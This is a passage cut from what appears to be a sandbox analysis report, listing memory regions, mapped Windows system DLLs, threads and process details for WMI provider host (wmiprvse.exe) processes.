AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:000b8de4" [0xc000000f] Region: id = 652 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 653 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 654 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 655 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 656 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 657 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 658 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 659 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 660 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 661 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 662 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 663 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 664 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 665 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 666 start_va = 0x480000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 667 start_va = 0x580000 end_va = 0x707fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 668 start_va = 0x710000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 669 start_va = 0x720000 end_va = 0xa56fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 670 start_va = 0xa60000 end_va = 0xbe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 671 start_va = 0xbf0000 end_va = 0xcaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bf0000" filename = "" Region: id = 672 start_va = 0xcb0000 end_va = 0xcb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cb0000" filename = "" Region: id = 673 start_va = 0xcc0000 end_va = 0xd3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 674 start_va = 0xd40000 end_va = 0xe3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d40000" filename = "" Region: id = 675 start_va = 0xe40000 end_va = 0xe40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e40000" filename = "" Region: id = 676 start_va = 0xe50000 end_va = 0xe50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e50000" filename = "" Region: id = 677 start_va = 0xe60000 end_va = 0xedffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 678 start_va = 0xee0000 end_va = 0xf5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 679 start_va = 0xf60000 end_va = 0xfdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 680 start_va = 0xfe0000 end_va = 0x105ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 681 start_va = 0x1060000 end_va = 0x10dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Region: id = 682 start_va = 0x10e0000 end_va = 0x115ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010e0000" filename = "" Region: id = 683 start_va = 0x1160000 end_va = 0x11dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 684 start_va = 0x11f0000 end_va = 0x11f2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "security.dll" filename = "\\Windows\\System32\\security.dll" (normalized: "c:\\windows\\system32\\security.dll") Region: id = 685 start_va = 0x1210000 end_va = 0x130ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 686 start_va = 0x1320000 end_va = 0x1322fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cimwin32.dll.mui" filename = "\\Windows\\System32\\wbem\\en-US\\cimwin32.dll.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\cimwin32.dll.mui") Region: id = 687 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 688 start_va = 0x180000000 end_va = 0x180002fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wmi.dll" filename = "\\Windows\\System32\\wmi.dll" (normalized: "c:\\windows\\system32\\wmi.dll") Region: id = 689 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 690 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 691 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 692 start_va = 0x7ff7732f0000 end_va = 0x7ff77336ffff monitored = 0 entry_point = 0x7ff773305f50 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 693 start_va = 0x7ff826ea0000 end_va = 0x7ff826eadfff monitored = 0 entry_point = 0x7ff826ea1da0 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 694 start_va = 0x7ff826fb0000 end_va = 0x7ff82717efff monitored = 0 entry_point = 0x7ff826fd7df0 region_type = mapped_file name = "cimwin32.dll" filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll") Region: id = 695 start_va = 0x7ff828070000 end_va = 0x7ff82807afff monitored = 0 entry_point = 0x7ff8280712b0 region_type = mapped_file name = "schedcli.dll" filename = "\\Windows\\System32\\schedcli.dll" (normalized: "c:\\windows\\system32\\schedcli.dll") Region: id = 696 start_va = 0x7ff828440000 end_va = 0x7ff828453fff monitored = 0 entry_point = 0x7ff828441310 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 697 start_va = 0x7ff8372a0000 end_va = 0x7ff8372c5fff monitored = 0 entry_point = 0x7ff8372a1cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 698 start_va = 0x7ff837480000 end_va = 0x7ff837495fff monitored = 0 entry_point = 0x7ff8374855e0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 699 start_va = 0x7ff837620000 end_va = 0x7ff837644fff monitored = 0 entry_point = 0x7ff837629900 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 700 start_va = 0x7ff837650000 end_va = 0x7ff837663fff monitored = 0 entry_point = 0x7ff837651800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 701 start_va = 0x7ff837670000 end_va = 0x7ff837765fff monitored = 0 entry_point = 0x7ff8376a9590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 702 start_va = 0x7ff837ca0000 end_va = 0x7ff837cb1fff monitored = 0 entry_point = 0x7ff837ca3580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 703 start_va = 0x7ff837cc0000 end_va = 0x7ff837cd0fff monitored = 0 entry_point = 0x7ff837cc2fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 704 start_va = 0x7ff839620000 end_va = 0x7ff83969efff monitored = 0 entry_point = 0x7ff839637110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 705 start_va = 0x7ff839700000 end_va = 0x7ff839718fff monitored = 0 entry_point = 0x7ff839704520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 706 start_va = 0x7ff839b10000 end_va = 0x7ff839b1bfff monitored = 0 entry_point = 0x7ff839b135c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 707 start_va = 0x7ff83c5c0000 end_va = 0x7ff83c60dfff monitored = 0 entry_point = 0x7ff83c5d1ce0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 708 start_va = 0x7ff83d300000 end_va = 0x7ff83d315fff monitored = 0 entry_point = 0x7ff83d301b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 709 start_va = 0x7ff83d3e0000 end_va = 0x7ff83d3f0fff monitored = 0 entry_point = 0x7ff83d3e3320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 710 start_va = 0x7ff83d570000 end_va = 0x7ff83d582fff monitored = 0 entry_point = 0x7ff83d572760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 711 start_va = 0x7ff83dc80000 end_va = 0x7ff83dcbdfff monitored = 0 entry_point = 0x7ff83dc8a050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 712 start_va = 0x7ff83de10000 end_va = 0x7ff83de19fff monitored = 0 entry_point = 0x7ff83de11660 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 713 start_va = 0x7ff8413b0000 end_va = 0x7ff8413d6fff monitored = 0 entry_point = 0x7ff8413b7940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 714 start_va = 0x7ff841d80000 end_va = 0x7ff841d8bfff monitored = 0 entry_point = 0x7ff841d827e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 715 start_va = 0x7ff841ec0000 end_va = 0x7ff841f39fff monitored = 0 entry_point = 0x7ff841ee1a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 716 start_va = 0x7ff8424a0000 end_va = 0x7ff8424f5fff monitored = 0 entry_point = 0x7ff8424b0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 717 start_va = 0x7ff842650000 end_va = 0x7ff84267cfff monitored = 0 entry_point = 0x7ff842669d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 718 start_va = 0x7ff842800000 end_va = 0x7ff842828fff monitored = 0 entry_point = 0x7ff842814530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 719 start_va = 0x7ff842970000 end_va = 0x7ff8429bafff monitored = 0 entry_point = 0x7ff8429735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 720 start_va = 0x7ff8429e0000 end_va = 0x7ff8429eefff monitored = 0 entry_point = 0x7ff8429e3210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 721 start_va = 0x7ff8429f0000 end_va = 0x7ff8429fffff monitored = 0 entry_point = 0x7ff8429f56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 722 start_va = 0x7ff842a00000 end_va = 0x7ff842a69fff monitored = 0 entry_point = 0x7ff842a36d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 723 start_va = 0x7ff842b60000 end_va = 0x7ff842b76fff monitored = 0 entry_point = 0x7ff842b61390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 724 start_va = 0x7ff842b80000 end_va = 0x7ff842d67fff monitored = 0 entry_point = 0x7ff842baba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 725 start_va = 0x7ff842e20000 end_va = 0x7ff842e62fff monitored = 0 entry_point = 0x7ff842e34b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 726 start_va = 0x7ff8434c0000 end_va = 0x7ff843686fff monitored = 0 entry_point = 0x7ff84351db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 727 start_va = 0x7ff844cb0000 end_va = 0x7ff844d5cfff monitored = 0 entry_point = 0x7ff844cc81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 728 start_va = 0x7ff844d60000 end_va = 0x7ff844e7bfff monitored = 0 entry_point = 0x7ff844da02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 729 start_va = 0x7ff844f90000 end_va = 0x7ff8450e5fff monitored = 0 entry_point = 0x7ff844f9a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 730 start_va = 0x7ff845260000 end_va = 0x7ff8453e5fff monitored = 0 entry_point = 0x7ff8452affc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 731 start_va = 0x7ff845400000 end_va = 0x7ff8454a6fff monitored = 0 entry_point = 0x7ff84540b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 732 start_va = 0x7ff845a10000 end_va = 0x7ff845a6afff monitored = 0 entry_point = 0x7ff845a238b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 733 start_va = 0x7ff845a70000 end_va = 0x7ff845b16fff monitored = 0 entry_point = 0x7ff845a858d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 734 start_va = 0x7ff845b20000 end_va = 0x7ff845be0fff monitored = 0 entry_point = 0x7ff845b40da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 735 start_va = 0x7ff845da0000 end_va = 0x7ff845e3cfff monitored = 0 entry_point = 0x7ff845da78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 736 start_va = 0x7ff845e50000 end_va = 0x7ff845ebafff monitored = 0 entry_point = 0x7ff845e690c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 737 start_va = 0x7ff845f80000 end_va = 0x7ff8461fcfff monitored = 0 entry_point = 0x7ff846054970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 738 start_va = 0x7ff846350000 end_va = 0x7ff846510fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 890 start_va = 0x7ff837e60000 end_va = 0x7ff837e8cfff monitored = 0 entry_point = 0x7ff837e76680 region_type = mapped_file name = "vsswmi.dll" filename = "\\Windows\\System32\\wbem\\vsswmi.dll" (normalized: "c:\\windows\\system32\\wbem\\vsswmi.dll") Region: id = 891 start_va = 0x7ff839930000 end_va = 0x7ff839ab1fff monitored = 0 entry_point = 0x7ff8399482a0 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 892 start_va = 0x7ff839910000 end_va = 0x7ff839927fff monitored = 0 entry_point = 0x7ff839912000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 893 start_va = 0x1330000 end_va = 0x140ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 894 start_va = 0x11e0000 end_va = 0x11e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Region: id = 895 start_va = 0x1410000 end_va = 0x1441fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\System32\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netmsg.dll.mui") Region: id = 5156 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5157 start_va = 0x410000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 5158 start_va = 0x1450000 end_va = 0x14cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001450000" filename = "" Region: id = 5735 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5736 start_va = 0x410000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 5737 start_va = 0x14d0000 end_va = 0x154ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014d0000" filename = "" Region: id = 5741 start_va = 0x400000 end_va = 0x402fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Thread: id = 89 os_tid = 0xe68 Thread: id = 90 os_tid = 0x23c Thread: id = 91 os_tid = 0x284 Thread: id = 92 os_tid = 0x960 Thread: id = 93 os_tid = 0x8e4 Thread: id = 94 os_tid = 0xec4 Thread: id = 95 os_tid = 0xedc Thread: id = 96 os_tid = 0xec0 Thread: id = 97 os_tid = 0xd94 Thread: id = 98 os_tid = 0xf44 Thread: id = 154 os_tid = 0x8c4 Thread: id = 166 os_tid = 0x1030 Process: id = "4" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x21396000" os_pid = "0xc3c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x27c" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xe], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c630" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 739 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 740 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 741 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 742 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 743 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 744 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 745 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 746 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 747 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 748 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 749 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 750 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 751 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 752 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 753 start_va = 0x480000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 754 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 755 start_va = 0x550000 end_va = 0x550fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 756 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 757 start_va = 0x570000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 758 start_va = 0x670000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 759 start_va = 0x6f0000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 760 start_va = 0x770000 end_va = 0x776fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 761 start_va = 0x780000 end_va = 0x780fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 762 start_va = 0x790000 end_va = 0x790fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 763 start_va = 0x7a0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 764 start_va = 0x7b0000 end_va = 0x7b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 765 start_va = 0x7c0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 766 start_va = 0x7d0000 end_va = 0xb06fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 767 start_va = 0xb10000 end_va = 0xc97fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b10000" filename = "" Region: id = 768 start_va = 0xca0000 end_va = 0xe20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ca0000" filename = "" Region: id = 769 start_va = 0xe30000 end_va = 0xf2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 770 start_va = 0xf30000 end_va = 0xfaffff 